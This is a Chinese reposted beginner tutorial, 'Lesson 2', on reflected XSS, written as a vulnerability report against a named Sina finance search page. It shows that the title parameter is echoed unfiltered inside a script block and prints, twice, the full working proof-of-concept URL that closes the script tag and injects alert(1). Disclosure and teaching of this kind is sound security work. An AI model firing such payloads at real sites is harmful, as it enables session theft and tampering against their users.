好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

瘦子XSS教程第2课:输出在<

第二课:http://www.2cto.com/Article/201301/186364.html

唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的

直接输出在源文件里,无任何过滤的反射型XSS

详细说明: 漏洞 地址:

 

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.p html ?symbol=002698&orgname=&industry=&title=&t1=all

 

在title处随便写一串字符,然后查看源代码,以1111111111为例:

 

 

 

 

可以看到是直接输出在JS脚本之间的。加入闭合前面的,测试通过,未作任何过滤:

 

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all

 

 

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all

 

该问题出现在多个子站页面,请全面检查。   

修复方案: U know. 

 

查看更多关于瘦子XSS教程第2课:输出在<的详细内容...

  阅读:41次